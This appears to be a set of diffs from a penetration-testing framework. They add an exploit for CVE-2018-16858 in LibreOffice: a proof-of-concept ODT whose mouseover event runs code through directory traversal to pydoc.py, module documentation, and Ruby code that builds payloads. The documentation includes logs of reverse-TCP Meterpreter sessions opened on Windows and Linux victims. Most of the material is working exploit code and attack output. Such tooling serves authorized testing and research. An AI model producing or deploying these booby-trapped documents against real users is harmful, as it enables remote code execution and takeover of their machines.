@@ -1,0 +1,259 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta>
+ <office:settings>
+  <config:config-item-set config:name="ooo:view-settings">
+   <config:config-item config:name="ViewAreaTop" config:type="long">0</config:config-item>
+   <config:config-item config:name="ViewAreaLeft" config:type="long">0</config:config-item>
+   <config:config-item config:name="ViewAreaWidth" config:type="long">35959</config:config-item>
+   <config:config-item config:name="ViewAreaHeight" config:type="long">12913</config:config-item>
+   <config:config-item config:name="ShowRedlineChanges" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="InBrowseMode" config:type="boolean">false</config:config-item>
+   <config:config-item-map-indexed config:name="Views">
+    <config:config-item-map-entry>
+     <config:config-item config:name="ViewId" config:type="string">view2</config:config-item>
+     <config:config-item config:name="ViewLeft" config:type="long">9772</config:config-item>
+     <config:config-item config:name="ViewTop" config:type="long">2501</config:config-item>
+     <config:config-item config:name="VisibleLeft" config:type="long">0</config:config-item>
+     <config:config-item config:name="VisibleTop" config:type="long">0</config:config-item>
+     <config:config-item config:name="VisibleRight" config:type="long">35957</config:config-item>
+     <config:config-item config:name="VisibleBottom" config:type="long">12912</config:config-item>
+     <config:config-item config:name="ZoomType" config:type="short">0</config:config-item>
+     <config:config-item config:name="ViewLayoutColumns" config:type="short">1</config:config-item>
+     <config:config-item config:name="ViewLayoutBookMode" config:type="boolean">false</config:config-item>
+     <config:config-item config:name="ZoomFactor" config:type="short">100</config:config-item>
+     <config:config-item config:name="IsSelectedFrame" config:type="boolean">false</config:config-item>
+     <config:config-item config:name="AnchoredTextOverflowLegacy" config:type="boolean">false</config:config-item>
+    </config:config-item-map-entry>
+   </config:config-item-map-indexed>
+  </config:config-item-set>
+  <config:config-item-set config:name="ooo:configuration-settings">
+   <config:config-item config:name="ProtectForm" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PrinterName" config:type="string"/>
+   <config:config-item config:name="EmbeddedDatabaseName" config:type="string"/>
+   <config:config-item config:name="CurrentDatabaseDataSource" config:type="string"/>
+   <config:config-item config:name="LinkUpdateMode" config:type="short">1</config:config-item>
+   <config:config-item config:name="AddParaTableSpacingAtStart" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="FloattableNomargins" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="UnbreakableNumberings" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="FieldAutoUpdate" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="AddVerticalFrameOffsets" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="BackgroundParaOverDrawings" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="AddParaTableSpacing" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="ChartAutoUpdate" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="CurrentDatabaseCommand" config:type="string"/>
+   <config:config-item config:name="AlignTabStopPosition" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrinterSetup" config:type="base64Binary"/>
+   <config:config-item config:name="PrinterPaperFromSetup" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="IsKernAsianPunctuation" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="CharacterCompressionType" config:type="short">0</config:config-item>
+   <config:config-item config:name="ApplyUserData" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="SaveGlobalDocumentLinks" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="SmallCapsPercentage66" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="CurrentDatabaseCommandType" config:type="int">0</config:config-item>
+   <config:config-item config:name="SaveVersionOnClose" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="UpdateFromTemplate" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrintSingleJobs" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PrinterIndependentLayout" config:type="string">high-resolution</config:config-item>
+   <config:config-item config:name="EmbedSystemFonts" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="DoNotCaptureDrawObjsOnPage" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="UseFormerObjectPositioning" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="IsLabelDocument" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="AddFrameOffsets" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="AddExternalLeading" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="UseOldNumbering" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="OutlineLevelYieldsNumbering" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="DoNotResetParaAttrsForNumFont" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="IgnoreFirstLineIndentInNumbering" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="AllowPrintJobCancel" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="UseFormerLineSpacing" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="AddParaSpacingToTableCells" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="UseFormerTextWrapping" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="RedlineProtectionKey" config:type="base64Binary"/>
+   <config:config-item config:name="ConsiderTextWrapOnObjPos" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="DoNotJustifyLinesWithManualBreak" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="EmbedFonts" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="TableRowKeep" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="TabsRelativeToIndent" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="IgnoreTabsAndBlanksForLineCalculation" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="RsidRoot" config:type="int">1115298</config:config-item>
+   <config:config-item config:name="LoadReadonly" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="ClipAsCharacterAnchoredWriterFlyFrames" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="UnxForceZeroExtLeading" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="UseOldPrinterMetrics" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="TabAtLeftIndentForParagraphsInList" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="Rsid" config:type="int">1115298</config:config-item>
+   <config:config-item config:name="MsWordCompTrailingBlanks" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="MathBaselineAlignment" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="InvertBorderSpacing" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="CollapseEmptyCellPara" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="TabOverflow" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="StylesNoDefault" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="ClippedPictures" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="TabOverMargin" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="TreatSingleColumnBreakAsPageBreak" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="SurroundTextWrapSmall" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="ApplyParagraphMarkFormatToNumbering" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PropLineSpacingShrinksFirstLine" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="SubtractFlysAnchoredAtFlys" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="DisableOffPagePositioning" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="EmptyDbFieldHidesPara" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrintAnnotationMode" config:type="short">0</config:config-item>
+   <config:config-item config:name="PrintGraphics" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrintBlackFonts" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PrintProspect" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PrintLeftPages" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrintControls" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrintPageBackground" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrintTextPlaceholder" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PrintDrawings" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrintHiddenText" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PrintTables" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrintProspectRTL" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PrintReversed" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PrintRightPages" config:type="boolean">true</config:config-item>
+   <config:config-item config:name="PrintFaxName" config:type="string"/>
+   <config:config-item config:name="PrintPaperFromSetup" config:type="boolean">false</config:config-item>
+   <config:config-item config:name="PrintEmptyPages" config:type="boolean">false</config:config-item>
+  </config:config-item-set>
+ </office:settings>
+ <office:scripts>
+  <office:script script:language="ooo:Basic">
+   <ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink">
+    <ooo:library-embedded ooo:name="Standard"/>
+   </ooo:libraries>
+  </office:script>
+ </office:scripts>
+ <office:font-face-decls>
+  <style:font-face style:name="Arial1" svg:font-family="Arial" style:font-family-generic="swiss"/>
+  <style:font-face style:name="Liberation Serif" svg:font-family="&apos;Liberation Serif&apos;" style:font-family-generic="roman" style:font-pitch="variable"/>
+  <style:font-face style:name="Liberation Sans" svg:font-family="&apos;Liberation Sans&apos;" style:font-family-generic="swiss" style:font-pitch="variable"/>
+  <style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="system" style:font-pitch="variable"/>
+  <style:font-face style:name="Microsoft YaHei" svg:font-family="&apos;Microsoft YaHei&apos;" style:font-family-generic="system" style:font-pitch="variable"/>
+  <style:font-face style:name="NSimSun" svg:font-family="NSimSun" style:font-family-generic="system" style:font-pitch="variable"/>
+ </office:font-face-decls>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="12pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="12pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="12pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="12pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text"/>
+  <style:style style:name="Heading" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Text_20_body" style:class="text">
+   <style:paragraph-properties fo:margin-top="0.1665in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" fo:keep-with-next="always"/>
+   <style:text-properties style:font-name="Liberation Sans" fo:font-family="&apos;Liberation Sans&apos;" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="14pt" style:font-name-asian="Microsoft YaHei" style:font-family-asian="&apos;Microsoft YaHei&apos;" style:font-family-generic-asian="system" style:font-pitch-asian="variable" style:font-size-asian="14pt" style:font-name-complex="Arial" style:font-family-complex="Arial" style:font-family-generic-complex="system" style:font-pitch-complex="variable" style:font-size-complex="14pt"/>
+  </style:style>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/>
+  </style:style>
+  <style:style style:name="List" style:family="paragraph" style:parent-style-name="Text_20_body" style:class="list">
+   <style:text-properties style:font-size-asian="12pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/>
+  </style:style>
+  <style:style style:name="Caption" style:family="paragraph" style:parent-style-name="Standard" style:class="extra">
+   <style:paragraph-properties fo:margin-top="0.0835in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" text:number-lines="false" text:line-number="0"/>
+   <style:text-properties fo:font-size="12pt" fo:font-style="italic" style:font-size-asian="12pt" style:font-style-asian="italic" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss" style:font-size-complex="12pt" style:font-style-complex="italic"/>
+  </style:style>
+  <style:style style:name="Index" style:family="paragraph" style:parent-style-name="Standard" style:class="index">
+   <style:paragraph-properties text:number-lines="false" text:line-number="0"/>
+   <style:text-properties style:font-size-asian="12pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#000080" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
+  <text:outline-style style:name="Outline">
+   <text:outline-level-style text:level="1" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+   <text:outline-level-style text:level="2" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+   <text:outline-level-style text:level="3" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+   <text:outline-level-style text:level="4" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+   <text:outline-level-style text:level="5" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+   <text:outline-level-style text:level="6" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+   <text:outline-level-style text:level="7" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+   <text:outline-level-style text:level="8" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+   <text:outline-level-style text:level="9" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+   <text:outline-level-style text:level="10" style:num-format="">
+    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
+     <style:list-level-label-alignment text:label-followed-by="listtab"/>
+    </style:list-level-properties>
+   </text:outline-level-style>
+  </text:outline-style>
+  <text:notes-configuration text:note-class="footnote" style:num-format="1" text:start-value="0" text:footnotes-position="page" text:start-numbering-at="document"/>
+  <text:notes-configuration text:note-class="endnote" style:num-format="i" text:start-value="0"/>
+  <text:linenumbering-configuration text:number-lines="false" text:offset="0.1965in" style:num-format="1" text:number-position="left" text:increment="5"/>
+ </office:styles>
+ <office:automatic-styles>
+  <style:style style:name="T1" style:family="text">
+   <style:text-properties officeooo:rsid="001104a2"/>
+  </style:style>
+  <style:page-layout style:name="pm1">
+   <style:page-layout-properties fo:page-width="8.5in" fo:page-height="11in" style:num-format="1" style:print-orientation="portrait" fo:margin-top="0.7874in" fo:margin-bottom="0.7874in" fo:margin-left="0.7874in" fo:margin-right="0.7874in" style:writing-mode="lr-tb" style:footnote-max-height="0in">
+    <style:footnote-sep style:width="0.0071in" style:distance-before-sep="0.0398in" style:distance-after-sep="0.0398in" style:line-style="solid" style:adjustment="left" style:rel-width="25%" style:color="#000000"/>
+   </style:page-layout-properties>
+   <style:header-style/>
+   <style:footer-style/>
+  </style:page-layout>
+ </office:automatic-styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
+   <text:sequence-decls>
+    <text:sequence-decl text:display-outline-level="0" text:name="Illustration"/>
+    <text:sequence-decl text:display-outline-level="0" text:name="Table"/>
+    <text:sequence-decl text:display-outline-level="0" text:name="Text"/>
+    <text:sequence-decl text:display-outline-level="0" text:name="Drawing"/>
+    <text:sequence-decl text:display-outline-level="0" text:name="Figure"/>
+   </text:sequence-decls>
+   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://test/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1, calc.exe )?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1">move your mouse over the text</text:span></text:a></text:p>
+  </office:text>
+ </office:body>
+</office:document>

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md
@@ -1,0 +1,41 @@
+## Description
+
+  This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.4.1` that enables remote code execution.
+  Note: `6.0.x` versions are vulnerable to the directory traversal attack, but are not exploitable by this module due to the
+  lack of ability to pass arguments.
+
+  LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
+  to them. A macro can be tied to a program event by including the script that contains the macro and the function
+  name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the
+  Python script to be executed. This allows a program event to execute functions from Python scripts relative to the
+  path of the samples macros folder. The `pydoc.py` script included with LibreOffice contains the `tempfilepager` function
+  that passes arguments to `os.system`, allowing RCE.
+
+  This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.
+
+## Vulnerable Application
+
+  LibreOffice `v6.1.0-6.1.4.1`. Vulnerable versions for both Windows and Linux can be found [here](https://downloadarchive.documentfoundation.org/libreoffice/old/).
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/fileformat/libreoffice_macro_exec```
+  4. Do: ```set FILENAME <name>```
+  5. Do: ```set LHOST <ip>```
+  6. Do: ```set LPORT <port>```
+  7. Do: ```run```
+  8. Move the generated file to the target
+  9. Open the file with a vulnerable version of LibreOffice
+ 10. You should get a shell.
+
+## Scenarios
+
+### Version of software and OS as applicable
+
+  ```
+  msf > use module_name
+  msf auxiliary(module_name) > set POWERLEVEL >9000
+  msf auxiliary(module_name) > exploit
+  ```

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md
@@ -1,8 +1,8 @@
 ## Description
 
-  This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.4.1` that enables remote code execution.
-  Note: `6.0.x` versions are vulnerable to the directory traversal attack, but are not exploitable by this module due to the
-  lack of ability to pass arguments.
+  This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.
+  Note: `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by
+  this module due to the lack of ability to pass arguments.
 
   LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
   to them. A macro can be tied to a program event by including the script that contains the macro and the function
@@ -32,10 +32,66 @@
 
 ## Scenarios
 
-### Version of software and OS as applicable
+### Tested on LibreOffice 6.1.2.1 running Windows 7
 
   ```
-  msf > use module_name
-  msf auxiliary(module_name) > set POWERLEVEL >9000
-  msf auxiliary(module_name) > exploit
+  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec 
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
+
+  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [*] Sending stage (179779 bytes) to 192.168.37.156
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500
+
+  meterpreter > getuid
+  Server username: WIN-MGMN7ND70I1\a_user
+  meterpreter > sysinfo
+  Computer        : WIN-MGMN7ND70I1
+  OS              : Windows 7 (Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 1
+  Meterpreter     : x86/windows
+  ```
+
+### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1
+  target => 1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
+
+  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set LHOST 192.168.37.1
+  LHOST => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (985320 bytes) to 192.168.37.174
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.174:39912) at 2019-04-12 14:50:08 -0500
+
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : 192.168.37.174
+  OS           : Ubuntu 18.04 (Linux 4.18.0-16-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
   ```

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md
@@ -27,8 +27,9 @@
   6. Do: ```set LPORT <port>```
   7. Do: ```run```
   8. Move the generated file to the target
-  9. Open the file with a vulnerable version of LibreOffice
- 10. You should get a shell.
+  9. Start a handler
+ 10. Open the file with a vulnerable version of LibreOffice
+ 11. You should get a shell.
 
 ## Scenarios
 

--- a/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@@ -12,8 +12,20 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Placeholder',
+      'Name'           => 'LibreOffice Macro Code Execution',
       'Description'    => %q{
+        LibreOffice comes bundled with sample macros written in Python and
+        allows the ability to bind program events to them. A macro can be tied
+        to a program event by including the script that contains the macro and
+        the function name to be executed. Additionally, a directory traversal
+        vulnerability exists in the component that references the Python script
+        to be executed. This allows a program event to execute functions from Python
+        scripts relative to the path of the samples macros folder. The pydoc.py script
+        included with LibreOffice contains the tempfilepager function that passes
+        arguments to os.system, allowing RCE.
+
+        This module generates an ODT file with a mouse over event that
+        when triggered, will execute arbitrary code.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -26,6 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2018-16858' ],
           [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
         ],
+      'Platform'       => [ 'win', 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Targets'        =>
         [
           [
@@ -42,18 +56,17 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform'        =>  'linux',
               'Arch'            =>  ARCH_X86,
               'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
-              'CmdStagerFlavor' =>  [ 'printf' ]
+              'CmdStagerFlavor' =>  'printf'
             }
           ]
         ],
       'DisclosureDate'  =>  "Oct 18, 2018",
       'DefaultTarget'   =>  0
-    )
-  )
+    ))
 
     register_options(
     [
-      OptString.new('FILENAME', [true, 'Output file name', 'librefile.fodt'])
+      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
     ])
   end
 
@@ -62,7 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote
     {
       :remove_comspec       =>  true,
       :method               =>  'reflection',
-      :wrap_double_quotes   =>  false,
       :encode_final_payload =>  true
     }
     @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
@@ -70,13 +82,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def gen_linux_cmd
-    @cmd = generate_cmdstager
+    @cmd = generate_cmdstager.first
     @cmd << ' &amp;&amp; echo'
   end
 
   def gen_file(path)
     text_content = Rex::Text.rand_text_alpha(10..15)
 
+    # file from Alex Inführ's PoC post referenced above
